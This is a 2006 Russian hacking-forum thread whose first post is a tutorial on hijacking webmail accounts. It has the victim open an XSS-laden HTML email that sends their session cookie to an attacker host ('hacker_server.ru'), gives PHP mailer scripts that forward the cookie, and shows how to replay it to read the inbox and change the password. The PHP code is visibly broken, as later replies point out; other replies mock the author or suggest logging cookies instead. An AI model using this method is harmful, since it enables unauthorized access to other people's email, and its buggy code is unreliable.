Воруем мыло с помощью Кук

Discussion in 'Уязвимости Mail-сервисов' started by KPOT_f!nd, 28 Sep 2006.

  1. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Сейчас я расскажу, способе взлома мыльных ящиков,то есть о краже cookies.

    Поехали

    Для начала расскажу,что вообще за зверь этот cookie и где он обитает.Итак cookies - это такие файлики,которыми тебя пичкают практически все сайты и-нета,в них находится различная инфа о тебе,чаще всего это твой идентификатор сессии и прочая инфа,то есть когда ты в последний раз заходил на этот сайтик,что ты тут делал,чево скачивал и т.п. Хранятся cookies'ы в C:\Documents and Settings\твое имя\Cookies,это для современных окошек,а в 95,98,Me,путь будет немного другой(если сильно захочешь,то сам найдешь).Файлы эти преспокойно открываются блокнотом и в них на первый взгляд написаны беспорядочные буквы и цифры,даже знающий человек неврубиться в смысл,читая кукисы в блокноте ;) Лучше скачать удобную прогу под названием Cookie Editor (http://nsd.ru/soft/1/ano/CookieEditorSetup.exe) .Качай,качай,она тебе не раз еще пригодится ;)

    Ты спросишь,как же мне с помощью cookie узнать пароль,например от мыльника друга ? Да запросто ! Главное чтоб в почтовике был какой нибудь CSS баг (думаю как их искать тебя учить не надо,а если надо,обращайся ко мне на мыло,объясню танкистам).В данной статье мы будем рассматривать баг при неэкранировании HTML тегов в теле письма,он довольно часто встречается.
    Конечно можно обойтись и без поиска CSS багов.Есть у меня один приватный способ,который прокатывает абсолютно на всех без исключения почтовиках,но во первых он очень сложен в осуществлении и не любой новичок сможет его заюзать,во вторых в нем к каждому почтовику нужен особый подход,в третьих,это мой секрет,который не много кто знает,и в четвертых только подумайте,что будет если я расскажу о нем всем,бррр,ужасно представить какой начнется беспредел,но через пару дней эту багу прикроют и хакерское сообщество лишится очень крутого способа взлома мыльников и за это дело меня найдут и накостыляют мне,а потом в больницу приедут админы взломанных почтовиков и каждый сделает мне контрольный выстрел в голову.Аминь.

    Ладно,хватит о грустном.Как я уже говорил,или не говорил,некоторые почтовики (если не все) активно используют cookie для облегчения твоего доступа к почте (конечно если ты ставил галочку на "сохранить пароль" или "запомнить меня") и когда ты заходишь на сайт почтовика,смотришь,а в авторизационной формочке уже вбиты логин и пасс.Ты естественно кликнул "Войти" и побежал проверять почту.

    Итак чтобы украсть у кого-нибудь cookie нам понадобится всего-лишь послать на мыло жертвы хитро сформированное письмо.Разновидностей таких писем существует много,но у всех свои недостатки,мы будем использовать так называемое "письмо с блохой".Суть заключается в том,что письмо написано в формате HTML и содержит картинку размером 1:1 пиксель (это и есть блоха),естественно при попытке прочитать письмо,браузер попытается загрузить картинку и тем самым выполнит зловредный код написаный на JavaScript,который запустит php скрипт предназначенный для отправки ядерного письма ламеру.А другой php скрипт пришлет украденую куку к вам на мыло.

    Зловредный javaScript:

    Естественно вместо hacker_server.ru должен стоять адрес вашего серва с залитым mail_send.php и cookie_send.php (скрипты эти почти одинаковые,поэтому СМАТРЫ НЭ ПЭРЭПУТАЙ,а то будешь у себя кукисы воровать :))

    mail_send.php :

    PHP:
    <?
    $from="[email protected]";// от кого
    $email="[email protected]";// куда отправить
    $topic="hi, lamer";// тема письма
    $message=<html><сюда хакер вставит злой яваскрипт и какой нибудь текст для маскировки></html>
    //тело письма (оно как раз и будет содержать похищенные данные из кукиса)
    //собираем заголовки
    $headers="From: ".$from."\r\nReply-To:".$from."\r\n";
    $headers="MIME-Version: 1.0\r\n";
    $headers.="Content-Type: text/plain;";
    $body.=$messages."\r\n\r\n";
    mail($email,$topic,$body,$headers);// отправляем
    ?>
    cookie_send.php:

    PHP:
    <?
    $from="[email protected]";// от кого
    $email="[email protected]";// куда отправить
    $topic="vash cookie,Ser!";// тема письма
    $message=$QUERY_STRING;*/
    $headers="From: ".$from."\r\nReply-To:".$from."\r\n";
    $headers="MIME-Version: 1.0\r\n";
    $headers.="Content-Type: text/plain;";
    $body.=$messages."\r\n\r\n";
    mail($email,$topic,$body,$headers);// отправляем
    ?>
    Теперь нам осталось закачать cookie_send.php и mail_send.php на сервер,запустить мыло_сенд и ждать,когда Вася прочитает ваше письмо,а к вам свалится его кукис.

    Допустим у вас все вышло путем и кукис уже получил прописку на вашем мыле (кстати мыло советую использовать подставное).Теперь нам будет нужна рульная прога под названием Acces Diver (http://nsd.ru/soft/1/ano/ad4.140.installer.exe).Качай,устанавливай и запускай.Что уже скачал ? Да неплохой у тебя канал ).Ладно,первым делом беги в My skill и выбирай там Expert.Потом переходи в раздел Extra tools и выбирай HTTP Debagger,потом в поле HTTP address набираешь к примеру адрес папки "Входящее" в том почтовике,у юзера которого ты стырил кукис (узнать этот адрес легко,надо всего лишь зарегаться у почтовика, сунуться в папку "ВХОДЯЩИЕ" и списать ее адрес),затем устанавливаешь галочку напротив Use cookie и вводишь в появившемся поле стыреный кукис,далее жмем на connect и жмем на кнопочку Results.Вуаля,у тебя открылась страничка с папочкой "Входящие" да причем не твоя,а [email protected] !Таким точно образам можно лазить и по другим папкам и в том числе,копаться в настройках Васиного аккаунта,например сменить ему пароль :)
    Есть и другой способ,при котором надо использовать Cookie Editor для подделки собственных кукисов,но если захочешь,сам с ним разберешься.


     
    #1 KPOT_f!nd, 28 Sep 2006
    Last edited: 28 Sep 2006
  2. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Это, наверное, если сайт ФСБ какого-нить =)

    Судя по тому что выше "это мой секрет,который не много кто знает" - все хакерское сообщество представлено в твоем лице?

    Судя по смыслу (который ты пытался передать) - ищется активная XSS, с помощью нее скрипту передается кука, которую он (скрипт), может или отправить на мыло либо записать в лог (у тебя - по мылу (если заработает)). А вот это к чему и зачем:
    Зачем ему еще раз присылать это "ядерное письмо"? И как другой скрипт пришлет куку на мыло?

    Тока на мыльных сервисах времен Мамая. На современых - требуют ввести пароль.

    Способ то старый (но при переделке - еще активно юзающийся), тока ты как-то описал так, как будто сам его первый раз видишь. Вообщем, хрень какая-то бестолковая.
     
    _________________________
  3. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Чел это статья самая первая моя написана в 2002 году! Это чисто для начинаюших КУЛЦХАКЕРОВ!
     
  4. W!z@rD

    W!z@rD Борец за русский язык

    Joined:
    12 Feb 2006
    Messages:
    973
    Likes Received:
    290
    Reputations:
    43
    Если это статья, то она не там где нужно...
     
  5. S|\/|eliyK()T

    S|\/|eliyK()T Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    138
    Likes Received:
    58
    Reputations:
    11
    Ну а если она написана в 2002 году.. Нафига ты старьё пихаешь? Чтоб больше напостить? Убейся об стену!
     
  6. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    Фича старая! Как то Micro по моему протестил такую штуку на рамблере .. видео даже есть , бага щас не рабочая! Так что и в твоем случае тоже баги закрли
    Как сказал censored!
     
  7. D1s0rd3r

    D1s0rd3r Elder - Старейшина

    Joined:
    14 Jul 2006
    Messages:
    31
    Likes Received:
    2
    Reputations:
    0
    баян что ещё скзаать, полтора года назат точно её видел,зачем перепечатывать?
     
  8. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Ну так и напиши ее по-понятнее и главное - правильно!
    Особено вот эту фразу:
    которая, на самом деле, должна звучать типа так:
    p.s. но так как большиство юзают бесплатные хостинги, то мыло и не придет. Поэтому лучше куки не на мыло высылать, а писать в лог. Пример такого срипта (снифера - записывающего в лог все что ему передали) есть на Античате.
     
    _________________________
    #8 censored!, 28 Sep 2006
    Last edited: 28 Sep 2006
  9. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    Есле для начинающих, то ты хотяб скрипт отправки письма без ошибок напиши!
     
  10. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    А к чему эти понты?? Или рассказывал бы в статье свой "крутой" способ взлома всех мыл или держал бы инфу о его существовании при себе.
    И вообще, если ты такой крутой хэкир, что можешь спереть любой мейл, нафиг вообще тебе заниматься написанием подобной статейки?
     
  11. OraCool

    OraCool New Member

    Joined:
    17 Sep 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Зачем Унижать Чужие Идеи!Если вам не надо не читайте!А если что-то не нравится лучше б исправили ошибки или подсказали что-то новее!